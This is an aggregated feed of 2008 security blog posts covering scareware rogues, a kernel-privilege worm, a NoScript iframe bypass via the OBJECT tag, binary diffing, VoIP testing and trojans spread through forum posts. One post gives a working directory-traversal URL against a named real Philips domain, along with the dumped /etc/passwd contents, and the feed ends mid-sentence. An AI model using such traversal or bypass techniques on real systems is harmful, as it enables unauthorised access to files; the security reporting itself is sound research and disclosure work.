Whois records list the registrant of Pandora as Trans Eurogroup S A with a physical address of Victoria, SC. Where the heck is SC? It's the Republic of Seychelles, an archipelago nation that's located in the Indian Ocean.

On sites that refer to Pandora Software, you'll also find many cross-references to Innovagest2000. The innovagest2000.com website lists their contact address as Madrid, Spain.

Innovagest2000 claims to provide simply the best entertainment online. And just what kind of entertainment do they provide?

Entertainment such as SystemDefender, yet another rogue. More scareware.

Rogue SystemDefender Scan

Oh no, 324 threats! Is it the animation that's supposed to be fun… ?

It isn't that much fun if you click on the Free Scan Now button.

Do that and you'll get a file that we detect as Trojan-Downloader.Win32.Adload.ma.

Rogue SystemDefender - Trojan-Downloader.Win32.Adload.MA

Trojan-downloaders are kind of a killjoy when it comes to entertainment.

SysCleaner's website is also one of Innovagest2000's efforts from the looks of it.

Rogue SysCleaner Scan

Huh. SysCleaner also detects 324 things to fix, just like SystemDefender does. Guess that's part of the entertainment.

Using a selection of text from SysCleaner's privacy policy page, we located another batch of rogues.

AntiMalware 2009

Rogue AntiMalware 2009

Total Eliminator

Rogue TotalEliminator - Privacy Policy

eKerberos

Rogue eKerberos

FileShredder 2008

Rogue FileShredder 2008

Andromeda AntiVirus

Rogue Andromeda AntiVirus

Real Antivirus

Rogue Real Antivirus

PC Antispy

Rogue PC Antispy

Another selection of text from these sites yields many search results that are definitely not safe for work, i.e. pornography. Really obscene stuff. Morally upright citizens of the world, these guys — not.

The company that provides this so called entertainment is urbangestdesarrollos.com. The Urbangestdesarrollos site, which also claims a contact address of Madrid, Spain, is a carbon copy of Innovagest2000. Both Urban and Innova state that credit card statements may show New Concept Business SL.

New Concept Business S.L. claims to be from Barcelona, Spain. Hmm, Spain again. Whois records list the location as Barcelona but the contact person is located in Amsterdam, ES and has a phone number starting with +1.800.

ES as in Spain? Amsterdam, Spain? With a US toll-free phone number? Right, that's probably accurate, you think?

These creeps are really anonymous.

Which brings us to this bit of news: Microsoft and Washington state are suing scareware purveyors.

And just who is the target of their lawsuit? Texas-based Branch Software and its owner James Reed McCreary. RegistryCleanerXP is the name of his scareware application. The Whois information for registrycleanerxp.com, which is still online by the way, actually seems to have legitimate contact details.

Why isn't McCreary more anonymous? It's probably because he isn't the worst of the scareware that's out there. Yeah, he's guilty of deceptive and misleading advertising, and we're happy to see something being attempted, but there's lots worse out there.

The lawsuit against McCreary could very likely devolve into a First Amendment speech case attempting to define deceptive practices, and then eventually he'll walk. Just like spam king Jeremy Jaynes, who had his spam conviction overturned a few weeks ago. Jaynes was incredibly guilty, and yet the Virginia law just wasn't good enough. Too broad.

We can always hope that Washington has better laws, and a judge that understands all of the technical details, but we aren't holding our breath while waiting for the results.

What about the worst of the purveyors? The ones behind stuff such as Antivirus 2009, Malwarecore, WinDefender, WinSpywareProtect and XPDefender?

Brian Krebs has the key details, as he very often does, in this Security Fix post.

In a separate action, Microsoft filed five "John Doe" lawsuits to learn the identities of individuals responsible for marketing other scareware products.

Oh, John Doe lawsuits. That will take care of the problem, no? Once we learn the identities of the individuals, we'll just have to track them down in Dortmund/Madrid/Barcelona/Victoria/Amsterdam in Germany/Spain/Seychelles… and that's just the supposed locations for the John Does involved with the WinDefender chain of apps.

The Antivirus 2009 gang… is located in an entirely different set of European countries.

We applaud the effort, but we think it's going to take a lot more than the Attorney General of Washington to fix this problem. The Internet has no borders. Perhaps the effort would be better spent to create an international agency with the enforcement power to shut down rogue sites, many of which are hosted in the US?

Here's some final screenshots for you. Do see the tiny little red asterisk above the "y" in the word "Utility"?

Rogue WinDefender 2008 - Online Scanning Utility

That's a disclaimer.

Rogue WinDefender 2008 - Disclaimer

Is the text too small for you to read?

It says: "Typical system scan that shows how the real WinDefender product will be scanning your computer. Advertising purposes only."

John Doe truly has no shame.

On 01/10/08 At 06:54 PM

Really Legal Stuff - F-Secure Antivirus Research Weblog

October 01, 2008 11:30 PM
WinDefender 2008 is a rogue application. Rogues are also sometimes known as scareware.

Spyware Rogue : WinDefender 2008

Looks sort of familiar, doesn't it? Do you recognize the shape of the box?

The website creators appear to have "borrowed" a few things.

Let's check out the legal disclaimer.

Spyware Rogue : WinDefender 2008 : Really Legal Stuff

Hey — Really Legal Stuff — That's impressive. Where else can we find really legal stuff?

Spyware Rogue : Antivirus XP 2008 : Really Legal Stuff

Oh, Antivirus XP 2008. That particular rogue is a huge pain in the… neck.

The guys that produce this stuff are crooks and swindlers.

Spyware Rogue : Antivirus XP 2008

Here's a tip: If they claim to be REALiable — they're probably FAKE.

P.S. Performing a search for "really legal stuff" produces some very interesting but definitely NOT safe for work results.

Avoid following the links.

On 30/09/08 At 04:16 PM

A Different Twist on the Path to the Kernel - F-Secure Antivirus Research Weblog

October 01, 2008 11:30 PM
Now here's something we don't see every day.

It's an interesting twist on an old tactic — a worm that uses a local elevation of privilege vulnerability to access the kernel and execute code.

Most malware with rootkit functionality will tamper with the Windows kernel and attempt to execute code in kernel mode. Typically, a special driver is used to do this.

Worm.Win32.AutoRun.nox has a payload that restores the original function pointers back to the kernel's System Service Table (SST). The usual motivation for malware to do this is to remove any SST hooks installed by security software or other malware that might affect its successful operation.

As noted, normally a special driver or the physical memory device is used to get access to kernel-mode memory to restore the pointers. AutoRun.nox is different: it uses the "GDI Local Elevation of Privilege Vulnerability (CVE-2006-5758)" to do the job. For malware, it's rather unusual to see such a technique being used.

This vulnerability is due to an error in handling a shared memory structure, which allows the structure to be remapped from read-only to writable. April 2007's update (MS07-017) patched the vulnerability.

Antivirus :  Worm:W32/AutoRun.GM

After remapping the memory, the malware will initialize a CPalette object. It will then search for the palette object in the shared kernel memory structure. Since the memory is now writable, it can be altered to include a pointer to a special function that will remove any existing SST hooks. Finally, a call to GetNearestPaletteIndex will indirectly cause the function to be executed. Afterwards, the palette object is restored leaving no trace of the attack.

If attacking this vulnerability fails, the worm goes back to the tried-and-true "special driver" method. The driver is detected by us as Rootkit:W32/Agent.UG.

Either way, if the attack is successful, the machine is compromised as the attacker can access the kernel and execute code, or cause a denial of service.

This attack only works on machines that are missing the April 2007 update. Microsoft ranks this vulnerability as Important and recommends that users apply the update immediately.

Foresight? From: http://technet.microsoft.com/en-us/library/cc750820.aspx

"With this new release, the Window Manager, GDI, and related graphics device drivers have been moved to the Windows NT Executive running in kernel mode."

Response team post by — Lordian, Kimmo, Antti ...and Mika

On 26/09/08 At 02:52 PM

You're Not Paying Attention - F-Secure Antivirus Research Weblog

October 01, 2008 11:30 PM
You're not listening to what we're saying at all.

We quite clearly told you in our last blog post not to post the address "info@bulk-mail.org" to a public web page.

Now look what you've done. The address is all over the web and all over the blogosphere.

Please try to pay more attention in the future.

On 22/09/08 At 09:14 AM

Do spammers get spam? - F-Secure Antivirus Research Weblog

October 01, 2008 11:30 PM
Spam is still a problem.

Problem is, spam still works. So it won't be going away any time soon.

One spam vendor was recently spamming (yes) their own ads to a few million e-mail addresses. The message contained this PDF file:

info@bulk-mail.org

Two things worthy of noting here:

First: The old e-mail spam vendors are selling mobile phone text message spam lists as well.

Second: The vendor here is trying to avoid getting spammed themselves, by writing their e-mail address (which is info@bulk-mail.org) as info [at] bulk-mail [dot] org.

We suppose they are worried that an e-mail collecting spider might find their e-mail address (info@bulk-mail.org) and add it to a spam database. Then their address (which was info@bulk-mail.org) would get spam too. We guess.

Anyway, their address seems to be info@bulk-mail.org. Make sure you don't post it to a public web page or they might otherwise get spam.

On 19/09/08 At 03:06 PM

It's Time for 2009 - F-Secure Antivirus Research Weblog

October 01, 2008 11:30 PM
Today is the official launch day for our 2009 consumer lineup. Lots of work has gone into the launch, and plenty more has gone into the development. We'll have some details on the technology for you later.

In meantime, check out our Online Wellbeing campaign.

F-Secure Anti-Virus 2009

On 03/09/08 At 03:51 PM

Who Wants To Root Philips. - 0x000000 Security

October 01, 2008 11:30 PM
Writing about hacking and security isn't like anything else. It's cool and depressing, fun and dangerous at the same time. You'll never know what to expect. That's the beauty of it I guess. Since application hacking is quite well known by now, it depresses me very much to encounter things I am to speak about.

My first directory traversal was around 1999 when I more or less found myself intrigued by web applications and was pretty stunned that I could hack Cisco from a browser instead of a terminal. Imagine that, you know, without any GNU/Linux skills, running Netscape on some Windows box, trying to proof-root Cisco and send them my findings. And guess what, they never replied back. Maybe the hole is still open after all these years, who knows. It's fair to conclude that programmers still suck at security and it's likely not going to change any time soon. But the biggest problem for hackers or security pentesters is the way they have to contact a company to notify them of their security issues. To be honest, I never got an honest mail back from anyone, besides a couple of threats. One of them was Bank Of America, who pulled the plug on this very website. But I guess that comes with the territory. In the real world everyone would be happy if your neighbors notified you that you forgot your house keys on the outside of the front door. But no, not in Internet land.

A reader called haykuro, contacted me one month ago about a gaping hole on the Philips domain. A classic directory traversal vulnerability. While that wasn't enough, I tried to be an upstanding citizen and contacted Philips. Which turns out to be virtually impossible. They seem to have really good human resource firewalls, but lack proper application firewalls. They never got back to me even when I said that I will disclose it unto the net. So, one month later and it's still not fixed. I took a couple of hours to write mails back and forth, all in vain. Now I got only one thing to say: go suck on it!

Directory traversal:
http://www.trimension.philips.com/index.php?page=../../../../../../etc/passwd

Notice that the passwords are shadowed. At least they got that right. A shadowed password is indicated by an "x" in the second field: the password hashes aren't stored in the passwd file but reside in the shadow file. Nonetheless, you can obtain any file you want.

passwd file:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
ident:x:100:101::/home/ident:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/bin/false
ntp:x:38:38::/etc/ntp:/sbin/nologin
administrator:x:201:201::/home/administrator:/bin/bash
fhsvct:x:203:203::/home/fhsvcs:/bin/false
webstats:x:250:250::/var/ossec:/sbin/nologin

Bypassing NoScript Iframe Protection. - 0x000000 Security

October 01, 2008 11:30 PM
Recently I discussed the general problems of objects and the contexts in which they may behave like IFRAMEs. Strictly speaking, HTML's multimedia features allow the OBJECT element to include images, iframes, applets, and other rich content like Flash and movie clips. Previously HTML did allow content to be fetched from an applet as well. To embed another document, whether local or remote, we can utilize the IFRAME, the FRAMESET, EMBED or the OBJECT.

Generic embedding of content.

The w3c specification below shows all possible attributes that are allowed for an OBJECT[1]
<!ELEMENT OBJECT - - (PARAM | %flow;)*
-- generic embedded object -->
<!ATTLIST OBJECT
%attrs; -- %coreattrs, %i18n, %events --
declare (declare) #IMPLIED -- declare but don't instantiate flag --
classid %URI; #IMPLIED -- identifies an implementation --
codebase %URI; #IMPLIED -- base URI for classid, data, archive--
data %URI; #IMPLIED -- reference to object's data --
type %ContentType; #IMPLIED -- content type for data --
codetype %ContentType; #IMPLIED -- content type for code --
archive CDATA #IMPLIED -- space-separated list of URIs --
standby %Text; #IMPLIED -- message to show while loading --
height %Length; #IMPLIED -- override height --
width %Length; #IMPLIED -- override width --
usemap %URI; #IMPLIED -- use client-side image map --
name CDATA #IMPLIED -- submit as part of form --
tabindex NUMBER #IMPLIED -- position in tabbing order --
>

Embed content via an OBJECT.

Normally, CODEBASE and CLASSID are used to fetch data for an OBJECT, similarly for APPLETS. However, the DATA attribute makes it possible to render an OBJECT as an embedded IFRAME as we can see in the example below. In figure 1 we see a regular IFRAME that is successfully blocked by NoScript. Figure 2 shows an OBJECT that is rendered as an IFRAME, successfully bypassing the IFRAME protection.



The code below allows for remote embedding as seen in figure 2.

<object data="http://www.google.com" width="200" height="200"></object>

This will successfully fetch the document residing on a remote server and start to act as an IFRAME. The latest version of NoScript allows its users to block iframes in order to protect themselves from "Clickjacking". Whether or not Clickjacking works with iframes I do not know, since the details have not been released by Hansen, Grossman et al[2]. Certainly NoScript's current protection will fail if an OBJECT is used to replace an IFRAME, so the protection can be bypassed a priori.

Moreover, it is important to know that one does not need JavaScript to hijack "clicks" or other mouse events. I discussed hijacking events on a LABEL element to pass the event through to a submit button exactly one month ago[3]. This way, one is able to hijack user events to perform a CSRF, for example, or to hijack forms/iframes with it[4], and it is nearly impossible to prevent because it does not rely on JavaScript at all.

Fix.

Giorgio released a fix for NoScript. You can download the latest version of NoScript with additional protection right here: 1.8.1.9, upgrade

[1] http://www.w3.org/TR/REC-html40/struct/objects.html
[2] http://ha.ckers.org/blog/20080915/clickjacking/
[3] http://www.0x000000.com/index.php?i=312
[4] http://trickeries.com/216/an-interesting-csrf-attack/

Hi. I’m Stephen. - Matasano Chargen

October 01, 2008 06:23 PM

Hi!

I am Stephen A. Ridley. I recently started here at Matasano as a Senior Researcher (working out of the Manhattan office). I studied Physics, but for work I do software reversing, protocol replication, and exploit development. Before Matasano, I was at McAfee as a Senior Security Architect, in a small (5 person) R&D group learning from all-stars like Mark Dowd, John Viega, and David Coffey. Prior to McAfee I was at Aegis Research (which became ManTech Security and Mission Assurance) supporting the U.S. Defense and Intelligence communities doing reversing and vuln research. I got the opportunity to do all kinds of other neat stuff there, but mostly I got to be batboy for all the grand slammers on that team.

Here at Matasano, I again find myself fortunate enough to be on another phat team. I (probably like most of you) came up following groups like Teso, #ADM, and antisec.is while getting amused by groups like b4b0, ~el8, and gob bles. Also, like many folks in this industry, my motivation tends to wax and wane, limboing between states of limerence and ‘jaded disillusionment’. (If you remember, for a while folks thought it was all over after ~2001…but here we are.)

While the game is definitely different now, there is still some inspiring stuff being done. Most recently some of the public discoveries and techniques I found to be pretty re-inspiring in different ways were:

Work like this serves as reminders that there is still a lot of unexplored landscape out there with plenty of good work waiting to be done regardless of how bleak the future might sometimes look for cool bugs. I look forward to “settling in” to work on some of the neat projects we have lined up here at Matasano and hopefully posting a bit here on the blog.

A few things I forgot to mention :-) - ADD / XOR / ROL

October 01, 2008 07:57 AM
Hey all,

I forgot to mention a few things in the previous post:
  1. We're going to release BinDiff v2.1 on the 15th of October 2008. This is still the "old" diffing engine, albeit with a number of speed & reliability improvements.
  2. We're going to release BinNavi v2.0 on the 15th of October 2008. The number of new features in this release is huge -- it's really quite significant. You can read about it in detail on SP's blog.
    I will post some more information myself in the next days. Just a few mouth-watering keywords: Plugin API to extend Navi from Java/JRuby/Jython/JavaScript, built-in intermediate language, hierarchical tagging / namespaces for structuring large disassemblies, cross-module-graphing, managing multiple address spaces in one project, many user interface improvements, faster IDA->SQL export etc. etc. etc.
  3. The DiffDeluxe engine will be part of the next BinDiff release thereafter, probably no later than February 2008. If you are an existing BinDiff customer and would like to try the DiffDeluxe engine in order to provide us with feedback, do not hesitate to contact us -- it's available for testing now. We're especially interested in finding instances where DiffDeluxe performs worse than BinDiff v2.1. Switching the core diffing engine is a significant change, and I would not want to know of any instances where the new engine is worse than the old one.

Improving Binary Comparison (and it's implication for malware classification) - ADD / XOR / ROL

October 01, 2008 06:01 AM
I am at Virus Bulletin in Ottawa -- if anyone wants to meet to see our new stuff, please drop mail to info@zynamics.com ! :)

It has been a while since I posted here -- partially because I had a lot of work to finish, partially because, after having finished all this work, I took my first long vacation in a ... very long while.

So I am back, and there are a number of things that I am happy to blog about. First of all, I now have in writing that I am officially an MSc in Mathematics. For those that care about obscure things like extending the Euclidean algorithm to the ring of boolean functions, you can check the thesis here:
http://www.zynamics.com/files/Diplomarbeit.Thomas.Dullien.Final.pdf

For those that are less crazy about weird computational algebra: Our team here at zynamics has made good progress on improving the core algorithms behind BinDiff further. Our stated goal was to make BinDiff more useful for symbol porting: If you have an executable and you suspect that it might contain a statically linked library for which you have source access (or which you have analyzed before), we want BinDiff to be able to port the symbols into the executable you have, even if the compiler versions and build environments differ significantly, and even if the versions of the library are not quite the same.

Why is this important? Let's say you're disassembling some piece of network hardware, and you find an OpenSSL string somewhere in the disassembled image. Let's say you're disassembling an old PIX image (6.34 perhaps) and see the string

OpenSSL 0.9.5a 1 Apr 2000

This implies that PIX contains OpenSSL, and that the guys at Cisco probably backported any fixes to OpenSSL to the 0.9.5a version. Now, it would be fantastic if we could do the following: Compile OpenSSL 0.9.5a with full symbols on our own machine, and then "pull-in" these symbols into our PIX disassembly.

While this was sometimes possible with the BinDiff v2.0 engine (and v2.1, which is still essentially the same engine), the results were often lacking in both speed and accuracy. A few months back, Soeren and I went back to the drawing board and thought about the next generation of our diffing engine -- with specific focus on the ability to compare executables that are "far from each other", that differ significantly in build environments etc. and that only share small parts of their code. The resulting engine (dubbed "DiffDeluxe" by Soeren) is significantly stronger at this task.

Why did the original BinDiff v2 engine perform poorly ? There are a number of reasons to this, but primarily because of the devastating impact that a "false match" can have on further matches in the diffing process, and due to the fact that in the described scenarios, most of the executable is completely different, and only small portions match. The old engine had a tendency to match a few of the "unrelated components" of each executable, and these initial incorrect matches led to further bad matching down the road.

This doesn't mean the BinDiff v2 engine isn't probably the best all-round diffing engine you can find (I think it is, even if some early builds of the v2.0 suffered from silly performance issues -- those of you that are still plagued by this please contact support@ for a fix !) -- but for this particular problem some old architectural assumptions had to be thrown overboard.

Anyhow, to cut a long story short: While the results generated by DiffDeluxe aren't perfect yet, they are very promising. Let's follow our PIX/OpenSSL scenario:

DiffDeluxe operates with two "fuzzy" values for each function match: "Similarity" and "Confidence". Similarity indicates how successful the matching algorithm was in matching basic blocks and instructions within the two functions, and confidence indicates how "certain" DiffDeluxe is that this match is a correct one. This is useful to sort the "good" and "bad" matches, and to inspect results before porting comments/names. Anyhow, let's look at some high-confidence matches:


Well, one doesn't need to be a rocket scientist to see that these functions match. But in many situations, the similarity between two functions is not 100% evident: The following is a matched function with only 72% similarity (but 92% confidence):



So what is the overall result ? Out of the 3977 functions which we had in libcrypto.so, we were able to match 1780 in our Pix disassembly -- but with a big caveat: A significant number of these have very low similarity and confidence scores. This isn't surprising: The differences between the compiler used upon compile time of our Pix image (sometime 6 years ago ?) and the compiler we used (gcc 4.1, -O3) is drastic. All in all, we end up with around 250 high-confidence matches -- which is not too bad considering that we don't know how many functions from OpenSSL the Pix code actually contains.

In order to have a more clear idea of how well these algorithms perform, we need an example of which we know that essentially the entire library has been statically linked in. For this, luckily, we have Adobe Reader :-)

With all the Adobe patches coming up, let's imagine we'd like to have a look at the Javascript implementation in Acrobat Reader. It can be found in Escript.api. Now, I always presume that everybody else is as lazy as me, so I can't imagine Adobe wrote their own Javascript implementation. But when Adobe added Javascript to Acrobat Reader, there were few public implementations of Javascript around -- essentially only the engine that is nowadays known as "SpiderMonkey", i.e. the Mozilla Javascript engine. So I compiled SpiderMonkey into "libjs.so" on my Linux machine and disassembled Escript.api. Then I ran DiffDeluxe. The result:

Escript contains about 9100 functions, libjs.so contains about 1900. After running the diff, we get 1542 matches. Let's start verifying how "good" these matches are. As discussed above, DiffDeluxe uses a "similarity" and "confidence" score to rate matches. We get 203 matches with similarity and confidence above 90% -- for these functions, we can more or less blindly assume the matches are correct. If we have any doubts, we can inspect them:


Well, there is little question that this match was accurate.

The interesting question is really: How low can we go similarity- and confidence-wise before the results start deteriorating too badly ? Let's go low -- for similarities below 40%. For example the js_ConcatStrings match.


Manual inspection of the screenshot on the right will show that the code performs equivalent tasks, but that hardly any instructions remain identical.

Proceeding further down the list of matches, it turns out that results start deteriorating once both confidence and similarity drop below 0.3 -- but we have around 950 matches with higher scores, i.e. we have successfully identified 950 functions in Escript.api. While this is significantly less than the 1900 functions that we perhaps could have identified, it is still pretty impressive: After all, we do not know which exact version of SpiderMonkey was used to compile Escript.api, and significant changes could have been made to the code.

Clearly, we're a long way from matching 95% -- but we're very close to the 50% barrier, and will work hard to improve the 50% to 75% and beyond :-)

Anyhow, what does all this have to do with automatic classification and correlation of malware ?

I think the drastic differences induced by platform/compiler changes make it pretty clear that statistical measures that do not focus on the structure and semantics of the executable, but on some "simple" measure like instruction frequencies, fail. All the time. Behavioral methods might have a role to play, but they will not help you one bit if you acquire memory from a compromised machine, and they are trivially obfuscated by adding random noisy OS interaction.

I am happy to kill two birds with one stone: By improving the comparison engine, I am making my life easier when I have to disassemble PIX -- and at the same time, I am improving our malware classification engine. Yay :-)

Anyhow, as mentioned above: I am at the Virus Bulletin conference -- if anyone wishes to have a chat or have our products demo'ed, please do not hesitate to send mail to info@zynamics.com.

The Wild World of VoIP - Matasano Chargen

September 30, 2008 09:31 PM

I have a confession to make.

I’m Deaf.  As in, American Sign Language is my native language along with English.  I don’t hear very well either, though I fake it pretty well.

I have also been working on Voice over IP security for a number of months.

Yes, you may laugh now.  A Deaf man working with VoIP.


In the past, I was relatively disinterested in the whole idea, until I was tossed onto a large scale VoIP assessment project.  After all, I would never use these systems being Deaf.  Little did I know that I was shutting myself out of a fascinating and byzantine world.

VoIP is just a method of streaming data, and signalling where the data is to go, over an IP network infrastructure.  That’s all.  There is nothing complicated about this.  The fact that it carries voice does not make it magical.  Data is data.

And it is for this reason that I was able to assess, manipulate and break VoIP components in interesting ways.  It is just data over a network that can be observed, and altered.

However, there were times when I had to use a VoIP hardphone to make calls and troubleshoot.  Speakerphone mode and the volume button came in handy.  There was also always grabbing the unwary coworker and asking him what the voice error message from the switch was.  Fortunately this was a very rare instance over the months long engagement.


While the concept of VoIP is inherently simple, infrastructure implementations are often not.  Large-scale enterprise infrastructures are on an entirely different scale from Joe User using Vonage on his DSL connection.  These enterprise VoIP solutions typically include a signalling proxy or gateway, voicemail servers, voice recognition switchboard, conferencing, E-911, and various other components.

On top of that, SIP is not the only lingua franca of VoIP.  There is also the Media Gateway Control Protocol, and Megaco, usually used for PSTN to IP or IP to IP networks.  Also used on the client end are Nortel’s UNISTIM and Cisco’s Skinny Client Control Protocol (SCCP).

Many of these protocols are derived from older digital switching stuff such as Signaling System 7.  And the mindset that comes from completely controlling the communications mechanism carries over, creating huge exposures.  These systems were never designed to be on an open untrusted network, and the inheritors of these legacy protocols are essentially digital switching carried over IP instead of the control channel of a T1.  There are plenty of issues to be found during testing because of this.

Not only that, but the telecommunications vendors are their own worst enemies.  When one vendor was provided with a Unix-based system that had been hardened and secured to install their management tools on, they insisted on an unsecured vanilla installation.  They refused to consider installing on anything but a virgin operating system.  Unsurprisingly, in the security audit that followed, the system completely failed.

With another vendor, I found severe issues in their SIP stack by fuzzing with the protos test suite.  When confronted with this, their answer was to use a SIP proxy or firewall, because the system was never meant to be talking SIP with anything but the trunking server.  They were not willing to put in the engineering effort to harden their SIP stack.

To these telecommunications vendors, despite being on an IP based network, security is a feature, not a core requirement.


VoIP is a wild and byzantine world! Join in, and help make it a better place.  If I can do this, so can you — here are some tips to get started:

  • Use a fuzzer.  Matasano Security uses our own Ruby framework, Ruckus, to define protocol fields and headers.  Until we release it, you might use peach fuzzer, sulley, or spike.
  • Read a lot of RFCs.  I read hundreds of pages of RFCs until my eyes bled.
  • Get intimately familiar with Wireshark.  Wireshark was a huge help in allowing us to write our own custom implementations of the VoIP protocols.  The dissector source code is rather handy.  Use other people’s work, don’t reinvent the wheel!
  • A general purpose TCP/UDP switchboard proxy is also very helpful.  We typically start with just proxying.  And then as we understand the protocol more and more and implement it, the stream can be redirected through our Ruckus implementation for testing and debugging.
  • Remember: VoIP is data and signalling of how the data gets there.  Think of how to suborn the switching.  Can we spoof a signal?  Can we redirect streams?

Dynamic XSS Payloads in the face of NoScript - Alex's Corner

September 30, 2008 07:43 PM
While participating in the CSAW CTF on the weekend before last with s0ban, sirdarckcat and maluc (which we won btw, with 16375 points; RPISEC who placed second had 13575 points, go us ;), I had an interesting thought; one of our attacks was a persistent xss attack that loaded its payload from off-site so that we could gain some level of persistent control, however I realised that this attack would fail completely in the face of NoScript even if our xss succeeded since the person would not have our malicious domain whitelisted.

So, in light of that, I was thinking of how we could load our payload from off-site, without the remote site running JavaScript. Of course, I am assuming you have already bypassed NoScript's XSS Filters (e.g. because the attack was persistent), but this information is particularly useful for persistent attacks when you may want to change the payload.

After thinking about this for a while, I realised that we've already solved the problem a while ago when we were talking about using TinyURL for data storage way back in 2006: http://kuza55.blogspot.com/2006/12/using-tinyurl-for-storage-includes-poc.html.

Of course TinyURL would be of no use to us here as we are interested in being able to change our payload, however all it would require to be useful is (possibly some kind of synchronisation so that we execute in the order we want, rather than the order we get data back from our evil web server and) changing the URL to point to a domain you control.

Nothing really ground-breaking, but something interesting nonetheless.

Risky Business #80 — The Kiwicon II Panel, PLUS Secure-Freedom.org - Risky Business

September 30, 2008 12:28 AM

This week’s edition of Risky Business is brought to you by Check Point and hosted by Vigabyte virtual hosting. Risky Business 80 was recorded at the second annual Kiwicon conference in Wellington, New Zealand.

In this podcast, you’ll hear the panel I ran at Kiwicon. Panelists were Insomnia Security’s Brett Moore, the University of Auckland’s Peter Gutmann and Security-Assessment.com’s Paul Craig.

You’ll also hear an interview with Mark “pipes” Piper about his latest initiative — secure-freedom.org. It’s a site designed to funnel knowledge from corporate security guys into the delicate little brains of open source developers.

This week’s sponsor interview features Check Point Software’s Steve MacDonald discussing recent changes to Australia’s EPL process.

New CSRF paper with vulnerability disclosure - Jeremiah Grossman

September 29, 2008 08:26 PM
Ed Felten and Bill Zeller recently released a very well-written paper about Cross-Site Request Forgery (CSRF), including some real-world vulnerability examples from ING Direct, YouTube, MetaFilter, and The New York Times. As you all know so well, CSRF vulnerabilities are easy to find when you just decide to look on basically any website. Don't expect any ground-breaking research per se, but the paper's content is really helpful to those unfamiliar with CSRF (and that's still a lot of people - especially developers). Ed and Bill also did some work on a potential client-side solution, like LocalRodeo I think, which I hope to find time to investigate further. We need as many smart people as we can trying to solve this problem in creative ways. CSRF certainly isn't going to go away anytime soon.

Insecure Magazine Issue #18 - Jeremiah Grossman

September 29, 2008 05:18 PM
Issue #18 of my favorite online magazine, (IN)SECURE, is now available for download. The magazine is consistently content rich, high quality, and best of all - free! ;) This issue has several articles on Web security, one of which was written by yours truly, "Browser Security: Bolt it on, then build it in." Obviously with software security this is the opposite of how you want things to work, but when you consider the business objectives of Web browser security this is the way it tends to work. Here’s an excerpt of the premise...

"Some vendors attempt an über secure design - Opus Palladianum as an example, but few use it. Others opt for usability over security, such as Internet Explorer 6, which almost everyone used and was exploited as a result. Then, somewhere in the middle, is fan-favorite Firefox. The bottom line is that any highly necessary and desirable security feature that inhibits market adoption likely won't go into a release candidate of a major vendor. Better to be insecure and adopted instead of secure and obscure."

Other compelling web security articles:

- Web application security: risky business?
- Secure web application development
- Enterprise application security: how to balance the use of code reviews and web application firewalls from PCI compliance.

Automated spreading of malware through vBulletin forums - SecuriTeam Blogs

September 28, 2008 06:52 AM

Where would it be better to attack than where all the people trust each other?
A single individual or a group of individuals whose tracks lead to Turkish people and Chinese hosting or Chinese partners is spreading viruses through infected files and setup installations shared in vBulletin forums. It seems these individuals have a registration bot with a captcha bypass mechanism for vBulletin 3.7.xx versions (maybe other versions too) and they are using it to spread all kinds of malware.

I first found this when examining another Kaspersky 2009 installation located at:
http://www.httpshare.net/%E4%E5%F8%E3%E5%FA-%FA%E5%EB%F0%E5%FA-%7C-software-download/427522-kaspersky-antivirus-2009-full-34-p-ece-test-key-no-problem.html

The username spreading this message is “hakan_72_123” and with a simple google search we can see:
http://www.google.com/search?hl=en&client=firefox-a&rls=org.mozilla%3Ahe%3Aofficial&hs=sgc&q=hakan_72_123&btnG=Search

Hakan is not very shy to use the bot with his own name, go figure, maybe he is infecting thousands of forums manually?!
Anyway he is in www.vbhackers.com/members/hakan_72_123/ which explains a lot :)

So what did he do? He took the time to upload Kaspersky 2009 to
http://rapidshare.com/files/115362254/Kaspersky_2009_Full_Sueruem_by_hakan.rar

Well I just checked and it has been 2 months since I found it and the bad guy extended the business to torrents too; this is the same virus under the title “Kaspersky Antivirus 2009 Full + Key [App][www.zonatorrent.com]”:
http://isohunt.com/download/44622492/kaspersky.torrent

Inside the rar there is a txt file with the following text (Turkish, mis-encoded characters repaired; an English translation follows each line):

1- program demo değil full sürümdür.
(1- The program is not a demo; it is the full version.)

2- key girmek için şu sırayı takip et
license-merge-activate using key-brovse= buradan keyleri
çıkarttığın klasörü seçip listenin en altındakin üzerine çift tıklayıp
keyi gir.
(2- To enter the key, follow this order:
license - merge - activate using key - browse = from there select the folder
where you extracted the keys, double-click the one at the bottom of the list and
enter the key.)

HAZIRLAYAN: Hakan
(PREPARED BY: Hakan)

www.avrasyaforum.net

What they did is instead of the standard shared .msi file, they put a WinRAR self-extracting archive with an icon of an msi file. They made the archive so that WinRar’s shell extension doesn’t recognize it as extractable. Once executed it drops a file called svchost.exe in “%ProgramFiles%\Outlook Express\” which is a refreshing path to drop a trojan downloader in :)
It executes the svchost.exe (compressed with MiniPE) which then executes
the trojan downloaded to %temp%\wmoptimizer.dll using rundll32.exe:

